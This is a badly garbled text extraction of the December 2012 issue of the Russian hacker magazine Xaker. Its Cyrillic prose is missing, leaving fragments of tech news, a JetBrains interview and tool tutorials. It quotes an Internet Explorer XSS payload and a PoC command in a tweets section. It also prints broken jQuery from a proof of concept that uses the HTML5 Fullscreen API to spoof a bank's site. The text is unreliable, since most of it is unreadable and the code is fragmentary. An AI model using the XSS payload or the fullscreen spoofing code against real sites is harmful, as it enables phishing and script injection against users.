Хакер 2012 12 PDF

6 ANDROID
12 (167) 2012
102
PHP
,

Automated Teller Machine
: 270 .
18+
026
040
050
086

INTELLIJ IDEA
?
MEEGO, TIZEN, WEBOS
FIREFOX OS
step (step@real.xakep.ru)
Andrushock (andrushock@real.xakep.ru)
(ilembitov@real.xakep.ru)
(kurchenko@real.xakep.ru)

PCZONE UNITS
X-MOBILE
(goltsev@real.xakep.ru)
UNIXOID SYN/ACK
MALWARE
Dr. Klouniz (alexander@real.xakep.ru)
PR-
(grigorieva@glc.ru)
DVD

ant (ant@real.xakep.ru)
Unix-
Security-
D1g1 (evdokimovds@gmail.com)
ART
(alik@glc.ru)
PUBLISHING
, 119146, . , 1- ., . 5
.: (495)934-70-34, : (495) 545-09-06

-
.: (495) 935-70-34, : (495) 545-09-06
E-mail: advert@glc.ru
(kosheleva@glc.ru)
(dolganova@glc.ru)
(dmitryuk@glc.ru)

DVD-: claim@glc.ru.

- - , .
, - . , ,
,
, , .

, ,
, . .
?
? - , ,
.
- :
, . -
, :).
- : http://shop.glc.ru
: (495) 545-09-06
: (495) 663-82-77
: 8-800-200-3-999
: 101000, , , / 652,
: , 125367, . , , . 10, 1
,
77-50451 04 2012 .
Scanweb, . 204 800 .
.
. ,
, . .
.

Step ,

twitter.com/stepah
: content@glc.ru.
, , 2012
Content
006
HEADER
004
011
MEGANEWS

hacker tweets
-
018
019
Firefox

.

.

Proof-of-concept
: HTML5 Fullscreen API
COVERSTORY
026

JetBrains

020
,
LEGO, .
,
,
. , - .
074
116
PCZONE
036
040
042
046
Screen
Windows Linux
11.11

Kaspersky Lab?

Mac OS X
Drupal
Drupal ,

094
099
102
106
X-MOBILE
050
054
MeGoo, Tizen, webOS Firefox OS

Android

058
064
070
074
078
080
084
Easy Hack

:
Automated Teller Machine
2.0
-

Heap Spray

,
alloc/free IDAPython
X-Tools
7
MALWARE
086
090
][-: .

,

Android

PHP
MVC
110
Highload. 6

UNIXOID
116
121
SYN/ACK
126
132
7-
Web Application
Firewalls

Windows Server 2012:
Active Directory
FERRUM
136
137
138

TRENDnet
TEW-655BR3G
GIGABYTE GA-Z77X-UP7
For overclockers. By overclockers
!
Logitech
140
143
090
144
FAQ

8,5
WWW2
web-
MEGANEWS
14-
SLACKWARE,

.
SKYPE
WINDOWS- SKYPE
VoIP-
( ),
. . ,
,
Skype (, Facebook, Twitter).
Worm.
NgrBot ( Dorkbot),
.

Skype , :
?. ZIP-
exe ( Worm.NgrBot).
,
DDoS-. Worm.NgrBot
Letitbit, Sms4file, Vip-file, ,
, (YouTube, Gmail, Facebook) .
,
, .
, ,

Skype
(
Skype

).
TWITTER

,

.
004
TOPCODER
OPEN
.
,

BREAKPOINT
Breakpoint
, , ... .
,

830 ,
. , 15 .
,
, . ,
,
!
,
, .

Electric Feel, .
ANDROID

,
Android Police.
,
.
THE PIRATE BAY

,

.
GOOGLE
Android, Google

. .
12 /167/ 2012
FS-4300DN, ECOSYS,
.
, ,
.
, , ,
, . ,
* . 60
, .
, ,
.
*
KYOCERA Document Solutions Russia Phone: +7 (495) 741 0004 www.kyoceradocumentsolutions.ru

KYOCERA Document Solutions Inc. www.kyoceradocumentsolutions.com
MEGANEWS
FACEBOOK , .
FIREFOX 16-

ASUS PADFONE 2
FIREFOX? -
ASUS
PadFone 2. PadFone
,
. PadFone
, Android.
10,1- ,
- PadFone Station . ,
PadFone 2 , , ASUS , .
PadFone 2 . PadFone
2 Android 4.0 ICS,
Qualcomm Snapdragon S4 1,5 2 ;
Adreno 320.
4,7- Super IPS+ 1280 720
, Corning Fit. 13- ,
6 1080p/30fps
720p/60fps. 2140 .
, .
, ,

,
. , ,
:). -
, IPS 10,1 1280 800 (149 ppi)
5000 . ,
- PadFone 6600 .
:
- ,
, Bluetooth-,
ASUS ( , ,
PadFone 2). ,
,
.
Firefox 16
,
Mozilla ,
. ,
. .
Firefox
<Shift + F2> ( Developer Toolbar
Web Developer) , . ,
, , :) .
. ,
.
: ,
Firefox, . ,
, : console open . con<tab>o<tab><enter>, . , DeveloperTools dbg break, edit, inspect,
resize tilt. , .
. , ,
mozilla.org . , , inspect "#home-news h3", , 28px. 320 480?
resize to 320 480, Responsive Design
View. ,
24px, .
Firefox. ,
cookie, , . cookie list on mozilla.org, ,
.
, cookie remove WT_FPC
Remove. mozilla.org screenshot heading.png 0 false
h1, heading.png, 0
,
, , h1. Downloads.
, F1. pagemod.
- .
, , pagemod
remove attribute class *, ,
, pagemod replace "Out of Date News" "The New Hotness".
, , addon, pref, export html
. - , .
SOPHOS
0-DAY-,
, 312
( 19 30 )
006
12 /167/ 2012
MEGANEWS
2016 , .
UEFI

, UEFI.
,
Windows 8 Microsoft ,
,
.
Linux-, , , - .
Linux Foundation
,

.
Linux Foundation ,
Microsoft.
Git- kernel.org,
Linux Foundation. loader.efi,

, GRUB2.
,
. loader.
efi ,
. , Linux
Foundation
( CD/DVD LiveCD).
UPEK Protector Suite

.
- Acer, ASUS,
Dell, Lenovo, MSI, NEC, Samsung, Sony, Toshiba
.
, Elcomsoft
,
Windows,
UPEK. , UPEK Protector Suite
Windows . ,
, .
Windows ,
Windows . UPEK.
Elcomsoft ,
.
,
. HKEY_
LOCAL_MACHINE\SOFTWARE\Virtual Token\Passport\4.0\
Passport\ExData MD5.
256- , -
, 56-.

-

GitHub (tinyurl.
com/cpbqgl6) Metasploit.
BITCOIN ,

BITCOIN FOUNDATION, Bitcoin-
,
Linux Foundation.

,
,
:).
008
AMAZON

Kindle
. Amazon
, %username%!

FULL HD
Ultra HD,

3840 2160.
12 /167/ 2012
MEGANEWS
APPLE , iPad.
ANDROID 4.2

NEXUS
ANDROID

. , Google

Android 4.2 (
- Jelly Bean).
,
.
- Android (,
),
.

(
,
).
,
, .

, .
, Swype.
,
. , .
, , Photo Sphere, 3D- Google
Street View. , Google
Plus
Google Maps! ,
: , (, Instagram).
Miracast,

. ,
,
HDMI .
100 ,
LG , HDTV
.
Android
4.2 . ,
Google Now
,

,

,

,
.
,
.
Nexus 4
LG Nexus 10,
Samsung.

1,5- Qualcomm Snapdragon
S4 Pro Adreno 320 4,7
True HD IPS Plus (1280 768).
2 , - 8 16 , NFC. LTE , Bluetooth Wi-Fi.
2100 ( 15
300
). . Nexus 4 299 $
8 349 $ 16 .
, , 10,1 PLS
2560 1600 (16:10)!
300 dpi.
Cortex-A15 Mali
T604. LTE
( LTE ), WiFi NFC
. Nexus 10
16 400, 32 500 .
THREE MUSKETEERS PS3
PS3
:

LV0 (LEVEL ZERO)
010
12 /167/ 2012
#hacker tweets
@dlitchfield
, ,
, .
- , ...
@asintsov
SEHOP IE9 .
(
ASLR DEP).
@XSSVector
XSS IE, 0-:

<script/%00%00v%00%00>alert(/@
jackmasa/)</script> %c0
//(%000000%0dalert(1)// #IE #0day
insight-labs.org/?p=499
:
@dlitchfield

,
, .
:
,
, : -
.
,
. , SEHOP
, IE9 ?
, SEHOP. IE, ,
SEH ntdll
.
@jeremiahg
HTML5 API bit.ly/QPBzjs <

! !
:
HTML5.
@_frego_
@joernchen
, PoC-
CYBERWAR.
:
./CYBERWAR -t ::1
#pwnium #pinkiepie SVG useafter-free IPC

? :-) , 200 ,
.
@WTFuzz

Heap Spray UAF IE8.
#NoMoreHeapSprays
:
@shrrs
,
XSS, . ...
:

... , -
,
, XXS/SQLi,
XXE...

-,
inkie ie, .
,
8)
@j00ru
Adobe
Reader XI, 49 (!) , @gynvael Q2, Q3 2012.
.
:
49
. !
@pqorama
: ,
, -
. .
.
12 /167/ 2012
@kyprizel
SHA-3 ! Keccak
. www.nist.gov/itl/csd/
sha-100212.cfm
@sickipediabot
200 .
@glamchicken
#yac12,
#ZeroNights #gdd.
ZN, )
011
MEGANEWS
78% BITCOIN- , .

PhoneClick, ,
JinConvert. PhoneClick , . :
PhoneClick (, ,
). , , , .
( )
, IP-
20 . , ,
, .
. SMS post
factum. ? MSISDN
(Mobile Station Integrated Services Digital Number),
.
: ,
SMS.

,

,

.
012

2,3 .
.
CHROMEBOOK
SAMSUNG
-

,
,
MSISDN
.
landing page

,

, -
.
oogle Samsung Chromebook, , ,

.
, 249
,
. ARM- Exynos 5 Dual,
Cortex-A15. ,
Chromebook 11,6- (1366 768),
16 , 2 Bluetooth. Wi-Fi.
, ,
.
, Google , 1080p- 30 .
Chromebook 1,13 , 2,03 .
, Chrome OS, ,

Chrome. ,
: ,
Google.

TORRENTFREAK ,

Call of Duty.
PINKIE PIE

CHROME, 60
.
:).
, 23,2%

2012

,
.
12 /167/ 2012

, IT-!

( ) Hakin9. 2005 , . Hakin9 , .
, .
, ,

, .
- (,
) Hakin9, . , , -, DARPA Inference Cheking Kludge Scanner
(DICKS) Nmap.

, !
(!)
.
.
, , , ,
ASCII- 8====>, ,
Nmap
IPv7, ! Hakin9 Nmap Development.

,

(nmap.org/
misc/hakin9-nmapebook-ch1.pdf).
TREND MICRO :
ANDROID
483%

(175
)
12 /167/ 2012
013
MEGANEWS
500 Google Android , .
WIKILEAKS
F2FS
WIKILEAKS
Samsung
F2FS (FlashFriendly File System), , NAND Flash (SSD-, eMMC SD-).
, .
F2FS
Linux, , f2fs-tools,
F2FS ( mkfs.f2fs ). GPLv2.
F2FS . F2FS FTL ( ),
. NAND
, .
- (log-structured)
,
.
. NAND-
-.
,
-.
FLASH-
27 2012

,
WikiLeaks
-

,

,
WikiLeaks , WikiLeaks
. , , ,
. ...
.
WikiLeaks ,
, Stratfor, GIFiles,
. ,
.
, ,
JavaScript (
Wikipedia ).
, .
. Pastebin , , WikiLeaks

. , - , WikiLeaks
,
.
- LogFS c
- 16 2010
Linux 2.6.34. LogFS
UbiFS Yaffs2. F2FS
Android,
F2FS
.

1829 1867
, 406 ,
417 ,
345 CD.
American Assembly.
, ,

. .
014

Itsoknoproblembro,

DDoS-
70 / 30 pps,
.

RASPBERRY PI

512 , 1 ,
-
.
12 /167/ 2012
UBUNTU 12.10. ,

IPAD MINI, MACBOOK PRO RETINA IPAD4

iPhone, ,

Apple, .
iPad mini, . , iPad mini
iPad , :
7,9 9,7 . 1024 768 ,
iPad 2 (,
iPad mini 163 ).

7,2 . Apple A5,
Lightning. Apple
: Wi-Fi Wi-Fi.
459, 329 .
iPad Mini
, . Apple iPad , , ,
, .
A6X, .
iPad Lightning, Wi-Fi LTE ( ).

:
iOS 6 200
, iCloud
125 ,
3 iPod
100 iPad.
Apple MacBook Pro 13- Retina.

, : , 1,5 (1,9 ).
Core i5 i7 Intel HD Graphics
4000. , USB 3.0, MagSafe 2,
Thunderbolt, HDMI, , , 8 . DVD- .
MacBook 1700 .
!

(
, iPad
), iMac -
. :
5 . iMac 21,5- ( 1920 1080) 27-
( 2560 1440) . , , Intel Core i5 Core i7, NVIDIA GeForce, HD, , 3 .
DVD- .
Fusion Drive ,
13 SDD- 128 . SSD-
.
-, 1299,
1799 .
MICROSOFT
APPLE, MICROSOFT

, ,

12 /167/ 2012
015
HEADER
, NEW RELIC
.
,
. New Relic.
, ,
,
,
.

-
,
. ,
,
nginx, ,
, , .
.
New Relic (newrelic.com).
,
. New Relic
,
, , - .
,
, .
:
( )
- PHP (
)
. ,
, ,
.
,
, -
. SQL-,

!
NEW RELIC
.

( Windows Linux),
, -,
.
-,

- . :
, ,
,
. New Relic
, .
018
.NET, Ruby, Python ,

, PHP.
: Debian/
Ubuntu
apt-get -
.
-,

.
,
, CPU
( IO wait) ,
,
,

.
:
SSH
.
-
?
, ,
.
, ,
,
,
.
,
, .
, ,
,
-.
, New Relic !
14
, ,
, .

24
, , , .
,
,

( )
-. z
12 /167/ 2012
(alizar@gmail.com)
Proof-of-Concept
:
HTML5 FULLSCREEN API

, ,
URL, . , micr0soft.com.
URL.
,
.
HTML5 Fullscreen API ,

.
, .
.
Internet Explorer
. 2004 Windows
XP SP2 (bit.ly/TrPwme).

HTML5 Fullscreen API . -: elementToMakeFullscreen.requestFullScreen();.
, API , :
.
.
:
$(#fullscreen-button).on(click, function() {
var doc = document.documentElement;
if (doc.requestFullScreen) doc.requestFullScreen();
});
event.stopPropagation();
//
if (elementPrototype.requestFullscreen) {
document.documentElement.requestFullscreen();
} else if (elementPrototype.webkitRequestFullScreen) {
document.documentElement.webkitRequestFullScreen
(Element.ALLOW_KEYBOARD_INPUT);
} else if (elementPrototype.mozRequestFullScreen) {
document.documentElement.mozRequestFullScreen();
} else { // fail silently }
//
$(#menu, #browser).show();
$(#target-site).show();
});
.
c URL
.
, HTML5
.

Bank of America: bit.ly/OPVylg.
Chrome, Firefox Safari.
: bit.ly/V1tgB2.
, ,
.
? ? ,
. , , . z
mozRequestFullScreen()
webkitRequestFullScreen(). HTML5
Fullscreen API , Mozilla WebKit .

, - : <a href="https://www.
bankofamerica.com"> Bank of America</a> 100 .
URL . ,
.
event.preventDefault(),
,

.
$(html).on(click keypress, a, function(event) {
event.preventDefault();
12 /167/ 2012
Bank of America
019
COVERSTORY
NERD
GASM

2012
, .
][ ( )
,
( ) IT-.
-,
ThinkGeek.
020
12 /167/ 2012
TP-Link Nano TL-WR702N

bit.ly/ZtaC9p
WiFi- , (, ), TP-Link
Apple AirPort Express. , VPN- (
L2TP). , microUSB- ,
. , .
USB 3G- LTE-.
iCade 8-Bitty
bit.ly/Rd8r4D
Tower Defense, Angry Birds
2012
, , .

PC- GTA III, 90, 80
70- . , Atari, Namco, Midway
Activision,
. ,
.
8-Bitty , .
Android iOS .
$30
$25
Raspberry Pi Model
bitly.com/SecGwL
$35

. . -
,
, .
Raspberry Pi ,
,
.
][ .
, Raspberry Pi.
4
$45
12 /167/ 2012
CPU Wars
bit.ly/RswQ91
CPU Wars ,
. 30 , ,
,
.
. , ,
, , - .
, .
, .
021
COVERSTORY
NETGEAR Push2TV 3000

bit.ly/TDUsq2
,
Intel Windows .
, , , DLNA,
.
Wi-Fi-.
NETGEAR Push2TV Intel WiDi, Miracast. , Sandy Bridge Ivy Bridge, Android 4.2,
Samsung Galaxy S III, Nexus.
iFixit Pro Tech Toolkit

bit.ly/K3Mktq
iFixit
. Apple, , ,
- . . 70 , 54 ,
, , , , , , . ,
.
$85
$60
WowWee Robosapien
bit.ly/bS8xUM
, -
LEGO Mindstorms, Roomba. , ,
. Robosapien , .
, .
(, , , ,
), , .
8
$100
022
$100
Logitech K810
bit.ly/Sed4LG
Logitech
. K810 Bluetooth-
(, , ) .
. K810
, , . , .
12 /167/ 2012
InCase Range Messenger Bag

bit.ly/Qr8uYm
.
, , , , -
. ,
. InCase Range
, ,
,
. , , . , 13- 15- .
$130
10
bit.ly/PbWSKb

. Sportwatch . , ,

Nike . ,
, .
$145
11
Nike+ Sportwatch GPS
Matias Quiet Pro

bit.ly/Qr28Kv
. ,
,
, , , . , ,
. . Quiet Pro
USB-,
( PC Mac).
12
$250
12 /167/ 2012
$150
Livescribe Sky With Smartpen

bit.ly/5Pctb0
,
. , ,
. Evernote,
. ,

. , .
023
COVERSTORY
13
Withings Bodyscale
bit.ly/SGDGWc
$300
,
,
.
- ,
Withings.

(, , ,
),

. Wi-Fi, Bluetooth.
, ,
,
.
iPhone Android.
14
$300
Parrot AR.Drone 2
bit.ly/y88WLx

][, .

, .
,
720p.
ARM-
Linux.

.

.
$700
15
Printrbot
bit.ly/vxfPAX
,
3D-,
, . , -
,
, .
Printrbot.
,
.

Printrbot jr, Printrbot
Plus. .

(43 ).
024
12 /167/ 2012
COVERSTORY

, , JetBrains
. , ,
. , JetBrains .
JetBrains, . JetBrains, , IntelliJ IDEA?
COO .
. ,
: , , , -.
, ,
. ,
,
.

,
,
. , ,
. ,
, .
,
, .
Apple,
,
, . .
Mac?
. . Mac
, , ,
. IDE.
, : ,
, IDE,
.
INTELLIJ IDEA
IDE
IDE .
.
,
, , . IDE

.
026

. . ,
, .
, ,
? , , , ,
Renamer
,
Java.
, ,

. .
CodeSearch
JBuilder ( IDE
Borland),
12 /167/ 2012

JETBRAINS

2000 :
,

.

,
,
.

250
.
:
IntelliJ IDEA, ReSharper,
TeamCity, RubyMine,
PyCharm, PhpStorm,
WebStorm.

Borland.

.

.
12 /167/ 2012
027
COVERSTORY

(, ) .
IDE
, - .
,
, IntelliJ
IDEA. ,
IDE
( ). JBuilder
, Borland
... ,
, .
,
. . , ,
Eclipse.
, ,
community edition (Open Source), .
, -
Eclipse.
IDE: PyCharm Python,
RubyMine Ruby, WebStorm JavaScript,
PhpStorm PHP. , ,
-
. PHP-
IDE, ...
,
IDEA. , community
edition
. . Ultimate
Edition
.
Eclipse IBM
. : .
,
,
. IBM
Eclipse:
, , ,
,
- , .
Eclipse , ,
.

, ,
.
JetBrains
, .
,
, , .
: ,
.

IDE Mac.
AppCode. ,
, -
. XCode
, Apple
...
, IDEA, Java.
Mac Java
. , Mac ,

JDK, Apple Oracle.
AppCode, , XCode :).
, Eclipse?
, ,
IBM ( IBM
) ,
, , .
,
Design Patterns:
Elements of Reusable Object-Oriented Software
( - . ).
Gang of Four
( , ,
).
, , , ! , Eclipse !
, ,
,
.
, .NET. ReSharper
IntelliJ IDEA
.NET. ,
dotTrace, dotCover, dotPeek

. dotTrace
, dotCover ,
dotPeek , , ,

,
.
, .
TeamCity , (continuous
JETBRAINS
JAVA -

028
integration) ,
.
TeamCity .

MPS (Meta Programming System).
Generative Programming.
:

,
. ,

. .
, ,
, , DSL,

. , .
, JetBrains.
, Borland,
, Eclipse Generating
Modeling Framework.
, .
MPS
. ,
Language Oriented
Programming. :
- ,
, ,
,

, .
.

: Java,
. -

,
, ,
.
YouTrack,
.
Kotlin, 2010-.

.
Java .
. ,
, .
-
.

, ,
.
12 /167/ 2012
Kotlin
,
. ,
. -,
, Kotlin
, , .
, JVM
, Java,
, .
7, , JVM
invokedynamic,
Java
.

Kotlin JVM.

Java.
Java,
, , . ,
.
Kotlin
Java, .
. ,
, ,
, . Java
,
.

.
,
.
,
, Scala, ,

. Kotlin

.
-, . , -,
, .
,
.
Kotlin Open Source , . JetBrains
.

IDE.
Kotlin , .

, JetBrains
. . RnD .
90% .
- . JetBrains
.
12 /167/ 2012
029
COVERSTORY
TogetherSoft,
. 90-
.
,
SECR,
StarSoft. .
1998 , , , Together, ,

.
, .
TogetherSoft ( 50
) 1999 .
JetBrains:
,
.
TogetherSoft
. TogetherSoft modeling tools.
, UML
. , , , , .
-
. 1999
TogetherJ 3.0 ,
.
TogetherSoft .
, .
, , TogetherSoft .
. . ,
.
, , , .
Together
TogetherSoft,
Borland.
JetBrains , . .
CEO (, , CEO, ),
030
. ,
, .
, JetBrains
- .
, : , , , ,
Word, , .
.
release-management.
- ,
. ,
, , .
, .
, ,
, .
, .
JetBrains . JetBrains
. JetBrains
.
, ,
JetBrains .
CEO, ,
, , ,
.
.

, .

, , . .
. ,
, ,
. .

.
,
IPO,
.

,
IPO (
), ?
, JetBrains
, , ,
. ,
, , ,
. ,
.
, - - , -
. , ...
.
! .
- ,
IPO .
, . IPO
( ,

), ,
.
BORLAND
Borland .
1983 , Turbo Pascal. IDE.
,
.
:
,
. Borland .
Borland .
, ,
,
. ,
1991 ,
Paradox,
Borland Ashton Tate
dBase,
.
, , .
90- Inprise
. Delphi JBuilder. Borland

2003 TogetherSoft,
. Borland.

, ,
Together (
UML-), Together Borland.
,
, . 2006
Borland .
,
.
,
12 /167/ 2012
,
,
(Together Control Center, ,
JBuilder). 2003
2006 , Borland,
, , , . ,
,
,
.
,
.
.
Borland
. CEO
, ,
, . CEO, COO, senior vice president, vice president, senior director, director, project
manager, .
2006 Borland ,

,
.
, .
, .
- , ,
.
Google .

Google, .
. -
. Google
-.
.
,
.
Google .
:
4050 , 10.
: Google
. -.
, , -
,
.
,
. ,
, ,
,
.
12 /167/ 2012
IDE
, JetBrains, stand-up meeting. 1520

.
(Agile).
tool ( ):
Continuous integration, - peer
review, , .
,

.

. . ,

, ,
. ,
, ,
.

, . ,
,
(
, , , ).
, - ,
.
version control, , ,
.

, -
, . - -

, :
,
,
.
80/20 .
, 20%
, - .
,
Open Source .
JetBrains
. 24 ,
, ,
.
... ,
- :).
Google.
, ,
. .
, , ,
.
,
JetBrains, .
,
JetBrains ,
.
. , 40 , 20
.

.
, . : -
,
,
, .
, ,
.

.
.
. ,
, , CTO, COO, CEO,
.

, -
,
CEO ( -
).
, .

. , ,

, .
, , 50
. :
, ! .
, ,
,
.
. ,
, -, (
) skills. ,
,
, .
, ,
,
, , , ...
. ,
. z
031
141006, ,
. , , . 48
.: (495) 660 96 31, (495) 662 74 50,
: (495) 660 96 41
www.gk-monolit.ru
priem@gk-monolit.ru
,

- ,
. .

25- -

.
.
.
.

, .

( ) . , . , 33/2, . 1
(495) 739-93-93
(495) 967-65-57

-
,
1989

.
.

, McDonalds; Tanuki; , , ,

,
.
.

.
,
.

.
,

.

( )
(985) 727-57-62
,
.
www.gk-monolit.ru
Preview
28 .
.
X-MOBILE
50
,
, HTML5

. ,
, ,
.
MeeGo, webOS ,
,
,
OS/2
BeOS.
, ,
, .
.
X-MOBILE
54

, Android-
. , ,
, .
PCZONE
36
SCREEN
YouTube
,

.
!
70
034
:
,

, ATM
.
42

Mac OS X
, .
,
.
MALWARE
74
2.0
, ,

.
86

Stuxnet .
.
12 /167/ 2012
PC ZONE
(iliamrv@ya.ru)
, . , , . , , , .
: .
, , , . : .
, .
CamStudio
: camstudio.org
: Windows
: GPL
,

. -
,
CamStudio ,

036

. ,
, ,
:

. CamStudio
,
( Directory Recording).
,
, : , , .
.

,
. -
,
, .
,
Autopan (). CamStudio

( Smart Focus Camtasia).
, .

AVI SFW,
Lossless Video Codec ( ).

.
:

. ( ).
, .
12 /167/ 2012
Screen
Camtasia Studio
: is.gd/HEf0s9
: Mac OS, Windows
: trialware
,

,
,
.
: , ,
?
, Camtasia
Studio. ,
.
Record Tool. camrec (
AVI).
AVI .
,
.
.
loseless-
.

Camtasia Studio. (Timeline)
,
-, , .
, ,
. ,
SmartFocus ( ),
,
.
,

.
,
screencast.com youtube.com
Camtasia.
Produce
& Share. MP4, WMV,
MOV, AVI, M4V, . MP4
HTML5- .
299
,
Camtasia Studio
(Education Pricing)
179 . ,
, , , ?
: Camtasia
, ,
, .
FFmpeg
: ffmpeg.org
:
: LGPL
,
, . ,
FFmpeg. : FFmpeg
libavcodec,
.
, FFmpeg
Directshow,
Linux,
Windows .

Screen Capture Recorder,
. :
is.gd/rpLAXu. Virtual
Audio Capture Grabber Device
. : is.gd/wmOSsd.
Java
Runtime Environment
: is.gd/rtW9aT.

( Windows 8: ProgramData\Microsoft\
Windows\Start Menu\Programs\Screen
Capturer Recorder\) Screen Capturer
Recorder.
12 /167/ 2012
FFmpeg Screen
Capturer Recorder
Program Files\Screen Capturer Recorder\
configuration_setup_utility\vendor\ffmpeg\
bin\ffmpeg.exe. FFmpeg
:
ffmpeg [ ] -i
[ ] [ ]
[ ]
Screen Capturer Recorder

Audio Capture Grabber Device

ffmpeg -f dshow -i audio="virtualaudio-capturer":video="screen-capturerecorder" -r 10 -q 1 D:\record.mp4
-r -q ( ) .
FFmpeg:
bit.ly/tS32T3.
,
. ,
<Ctrl + C>
. bat, : is.gd/LXrrhg.
: ,
,
-
ffmpeg
,

.
:
ALLCapture, is.gd/SmWNrJ
Jing, techsmith.com/jing.html
TipCam, utipu.com
BB FlashBack, is.gd/jgD4Mh
HyperCam, hyperionics.com/hc
Screenpresso, screenpresso.com
Bandicam, bandicam.com
ActivePresenter, is.gd/wp924O
037
PC ZONE
FFmpeg => avconv

:
ffmpeg.org, libav.org/avconv.html
:
: LGPL
FFmpeg Linux .
Ubuntu x11grab
,

--enable-x11grab
. :
sudo apt-get install ffmpeg
FFmpeg . is.gd/rnzShk :
ffmpeg -f x11grab -s 1280x800 -r 15
-i :0.0 -vcodec qtrle myrecord.mov
-s , -r
, -i
.
: loseless- Apple Quicktime Animation
(RLE).
.
, ,
, : is.gd/3nsGzL.
FFcast :
is.gd/phMQey.
FFmpeg avconv.

: is.gd/ftUwUs.
:

libavcodec.
Avconv: !
:
xvidcap, is.gd/8pWhGH
pyvnc2swf, is.gd/houHHH
Wink, is.gd/zhNxAu
Kazam, https://launchpad.net/kazam
UVScreenCamera
: is.gd/JIozne
: Windows
: shareware
-
.
CamStudio Camtasia Studio.

UVScreenCamera?
, , ,
Adobe Flash .
: /
, , .

(. ).
(FLV, AVI).
:

, SWF, GIF, UVF. ,

UVScreenCamera
UVF (, ) EXE,

. EXE-
, .
EXE ,

.

(,
what-you-hear
). , ,
.
:
, .
UVScreenCamera
.
:
,
.

, loseless,
.

.
HandBrake (handbrake.fr),

H.264. Linux, Mencoder
, MPlayer (is.gd/UxecUp).
038
: 1024 768 px 1280 1024 px (720p).

: MP4, M4V, FLV, MOV
: H.264
: 500 kbps VBR
: 1030 fps
: AAC 48000 128 kbps Stereo VBR
: 16-bit
12 /167/ 2012
Screen
,
,

VLC
: videolan.org/vlc
:
: GPL 2
VLC media player
Windows,
Linux Mac OS.
.

Media Stream Capture Device (
). Windows
screen-capturerecorder virtual-audio-capturer,
DirectShow
. Linux Display ().

Convert, Start
Stop
.
VLC
H.264,
,
.
: ,
,
VLC .
VLC media player
RecordItNow
:
recorditnow.sourceforge.net
: Linux
: GPL 2
, GUI-
Linux
recordMyDesktop (is.gd/vKynEW) Istanbul (is.
gd/CJGnmP). ,
.
RecordItNow KDE, Linux,
.
,
RecordItNow , FFmpeg

.
.
blip.tv youtube.com.
: Linux
FFmpeg.
RecordItNow:

VirtualDub
virtualdub.org

,
,
.

. ,

, VirtualDub

drag & drop.
12 /167/ 2012
OpenShot
openshotvideo.com

.
,

, .
, .

.
PiTiVi
pitivi.org
Linux,

Gstreamer.
,
PiTiVi
, Ubuntu
.
Audacity
audacity.sourceforge.net

/
,
VST-,
. ,

.
039
PC ZONE
11.11

KASPERSKY LAB?
Kaspersky Lab? ?
, - .
, , ,
.

- Stuxnet .
:
(, QNX),
,

(PLC) ,
, ? , ,
,
.
,
: ,
Kaspersky Lab . Chief Strategy
Architect . .
PROOF-OF-CONCEPT
11.11
, ,
. Linux QNX
.
POSIX,
. x86,
, ARM.
,
,

. ,

. ,
, , .
040

,
.

. , MODBUS,
, .
( )
. ,
,
, firmware . .
,

.
12 /167/ 2012
11.11

. , . ,
.
,
.
,
, ,
, ,
! .
?
, .

:
, , ,
SCADA, , , ,
.
MODBUS,
Profibus
TCP/IP-,
(, Cisco). ,
(
)
, ,
,
.

,
.
.

100%
.

, . ,
11.11,

.
, , .
: , ,
, SMS? 11.11
,
, . ,

. , ,
.

, .

12 /167/ 2012
,
, .
.

, . ,

, .
. ,

. ,
, .
,
. ,
. :
, .
, 11.11

2009 L4.verified
seL4.
Isabelle/
HOL, .
200 000
-. 8700 C- 600 ,
.
160
seL4.
.
.
,
.

,
.
,
.
IPC, .
,
IPC.
,

.
,
,
.
.

50 ,
, . ,
, ,

,

. !
. ,
, ,
, .

.
?

,
, ,
.
, ,

, .

2030 ,
.
.
,
. ,
.
: type
enforsments, .
.
,

. ,

. z
041
PC ZONE
(wronglink@gmail.com)
MAC OS X
, OS X
*nix-, ,

.

,
,
.
UNIX Linux
, Mac OS X .

. :
MacPorts, Fink Homebrew.
,
.
-
042
,

(
):
1. bash. Mac OS.
,
.
2. ImageMagick
.
.
, Mac OS: GCC X11.

,
.
GCC

GNU Compiler Collection Mac OS Xcode
Command Line Tools.
Xcode ( Mac App
Store),
Apple (https://developer.apple.com/downloads/
index.action).
,
4 .
, Xcode, GCC
, : https://github.
com/kennethreitz/osx-gcc-installer.
X11
Mac OS 10.8, X11 ,
, , xquartz.macosforge.org.
12 /167/ 2012
MacPorts
info:
: www.macports.org
: bit.ly/48oBO0
( ): 15 741
$ port info bash-completion
MacPorts Apple 2002 .

, DarwinPorts.
, Mac OS
X BSD, ,
,
BSD-,

. ,

Mac OS Forge,
Apple. (, LaunchCtl),
. MacPorts bash, Tcl C.

*BSD Gentoo.
,

( USE-
Gentoo makefile.options FreeBSD).

. ,
, :
PHP? K, 5
4? , 5.4, 5.3 5.2? , 5.4
debug-? mod_php
? PEAR ? ,

.
$ sudo port install bash-completion
www.macports.org/install.php
PKG-.
,
.

.
profile- :
install:
Mac OS bash
, MacPorts
bash 4,
/opt/local/bin/bash -l .
: https://trac.macports.org/
wiki/howto/bash-completion.
profile-:
# bash-completion
if [ -f /opt/local/etc/profile.d/
bash_completion.sh ]; then
. /opt/local/etc/profile.d/
bash_completion.sh
fi
PortAuthority MacPorts
. ,

,
. ccache:
$ sudo port install ccache
/opt/local/etc/
macports/macports.conf,
configureccache:
configureccache yes

. , ImageMagick.
$ sudo port install ImageMagick

,
. ,
$ port list outdated
,
.
$ port uninstall installed

MacPorts ,

, MacPorts
.
(
),
// .

,

.
,
,
Mac OS X, MacPorts
,
. , -

Apple - .

,
.
export PATH=/opt/local/bin:/opt/
local/sbin:$PATH
.
:
$ sudo port selfupdate

bash.

search:
RUDIX
,
. , Mac-
*nix .
Rudix (rudix.org). Rudix Mac OS X,
, ,
PKG-. ,
, OS X .
, , ,
, . ,
OS X 10.8, .
$ port search completion
12 /167/ 2012
043
PC ZONE
Fink
Homebrew
mysql
5.5.28
5.5.28
5.0.96
5.5.27
: www.finkproject.org
: bit.ly/zg1ni1
( ): 14 175
imagemagick
6.8.0-2
6.8.0-2
6.5.8.10
6.7.7
1.0
0.7.13
0.7.13
1.0
postgresql
9.2.1
9.2.1
9.1.4
9.2.1
Fink
BSD
,
APT dpkg.
,
,
.
berkeley-db
5.3.21
5.3.21
5.3.15
5.3.21
postfix
2.9.4
2.9.4
2.9.0
samba
3.6.8
3.6.7
3.6.0
3.6.8
squid
3.2.3
3.2.3
3.1.14
3.2.2
gtk
3.6.1
3.4.4
2.18.9
2.24.11
Fink
Mac OS X Fink .
